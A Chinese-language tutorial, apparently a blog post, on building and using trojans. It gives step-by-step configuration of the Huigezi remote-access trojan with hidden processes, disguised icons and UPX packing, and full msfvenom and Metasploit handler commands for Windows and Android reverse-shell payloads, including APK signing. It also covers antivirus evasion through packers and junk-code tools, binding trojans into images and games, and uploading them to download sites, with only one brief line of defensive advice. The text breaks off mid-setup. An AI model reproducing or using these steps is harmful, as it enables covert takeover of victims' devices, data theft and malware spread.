介绍木马病毒的制作与使用，主要在虚拟机中操作，制作过程中需要一些软件百度如果找不到可以给我留言

木马简介

1. 什么是木马，木马和病毒什么关系
木马（Trojan）,也称木马病毒，是指通过特定的程序（木马程序）来控制另一台计算机。
计算机病毒（Computer Virus）是编制者在计算机程序中插入的破坏计算机功能或者数据的代码，能影响计算机使用，能自我复制的一组计算机指令或者程序代码。
木马不传染,病毒传染，木马主要是盗取的密码及其他资料，而病毒是不同程度不同范围的影响电脑的使用

2. 木马的类型
破坏型，密码发送型，远程访问型，键盘记录木马，DoS攻击木马，FTP木马，反弹端口型木马，代理木马，程序杀手木马

3. 木马的工作原理
攻击者利用一种称为绑定程序的工具将服务器端程序绑定到某个合法软件上，

诱使用户运行该合法软件，用户一旦运行该该合法软件，木马的服务器端程序就在用户毫无知觉的情况下完成安装。

服务器端程序：服务器运行的IP端口号，程序启动时机，如何发出调用，隐身，加密，采用通信方式。

4. msf设置payload相当于是木马
5. 中了木马的机器，就是肉鸡

木马演示（内网）

1.灰鸽子配置服务端

2.服务端传播

3.内网链接控制

灰鸽子是反弹型的木马
环境：虚拟机中两台XP系统，一个作为客户端XP，一个作为服务端XP2，用XP控制XP2
下载灰鸽子2008破解版，在XP中安装，
步骤：
配置服务程序（IP地址或域名）-》XP的IP地址如192.168.254.130
设置链接密码：如888888
设置保存路径
安装选项：是设置服务端安装时的位置，就是XP2中的安装位置
程序图标：设置诱惑性的图标
选中安装成功后自动删除安装文件
启动项设置：在任务管理器中的显示名称：改一下不好识别的名称
描述信息：不能带有木马信息的内容
高级选项：选中使用IEXPLORE.EXE（桌面程序）进程启动服务端程序
选中隐藏服务端进程
选中使用UPX加壳
点击生成服务器
将XP中生成的服务器程序复制到XP2中
XP2中安装，之后安装包自动删除
在XP中的灰鸽子程序里就会发现多了一台电脑
输入之前设置的连接密码888888即可链接这台电脑
出现XP2的C盘信息

4.外网使用木马原理
服务端的IP发送到一个指定的服务器（需要购买租用），在从服务器发到控制端（客户端），从而进行控制

利用msf生成木马

在kali系统中操作

1.生成可执行文件（木马服务端）
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.254.130 LPORT=4444 -f exe > abc.exe

将生成的可执行文件abc.exe复制到XP系统中

2.进入msf，使用handler模块
use exploit/multi/handler
show options
3.设置payload，查看设置，进行设置
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.254.130(本机ip)
4.执行exploit命令进行监听
msf exploit(handler)>exploit
5.受害者执行木马文件
只要XP中安装abc.exe 即可控制XP
执行shell，获取权限

木马免杀

1. 木马怎么被查到的？
根据特征码判定、根据行为判定
2. 加壳绕过杀毒
举例：男生无法进入女生宿舍，可以躲在箱子里，当成衣服搬进去。工具： UPX、北斗程序压缩、ASPack、PE-Armor、ASProtect。
3. 加花绕过杀毒
举例：在网上骂人的话会变成**，可以在中间加空格。加花和上边的加壳，都得用最新的工具才能做到免杀效果，大部分可用工具需要付费。工具：超级加花器、怒剑狂花加花器。
4. 软件保护软件免杀
工具：VMProtect（把木马变成虚拟机软件，然后执行时再释放）

木马的伪装和防范

1.换名字和图标
2.捆绑到图片
图片捆绑工具
将exe文件捆绑到图片中，一双击图片就会自动安装木马程序
3.捆绑到软件并且提示
用exeBinder捆绑工具
将木马捆绑到小游戏软件中（杀毒软件会报毒）
4.含有木马的软件提交到下载网站（就可以在他人电脑植入木马）
5.防范：尽量去官网下载软件，尽量找有官网的替代品，尽量用虚拟机。检查启动项，检查进程。

利用msf生成安卓木马

在kali中操作
1. 生成安卓木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.254.130 LPORT=4444 R > aaa.apk
2.创建证书
keytool -genkey -v -keystore apk-trojan-key.keystore -alias aaa -keyalg RSA -keysize 1024 -validity 999
出现需要输入内容随便填写，记住输入的密码就行
3.签名并验证
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore aaa.apk aaa
jarsigner -verify -verbose aaa.apk
4.使用Zipalign优化apk，忘掉这一步部分手机会无法安装
安装Zipalign：apt-get install zipalign （这是linux安装软件的命令）
优化：zipalign -v 4 aaa.apk aaaa.apk
在kali主文件中找到aaaa.apk（为了发送给安卓用户）
虚拟机中安装安卓系统，在kali中ping通安卓系统（也可以用夜神模拟器等）
5.启用metasploit加载模块并设置反弹链接
use exploit/multi/handler 加载攻击模块
set payload android/meterpreter/reverse_tcp
set options
set LHOST 192.168.254.130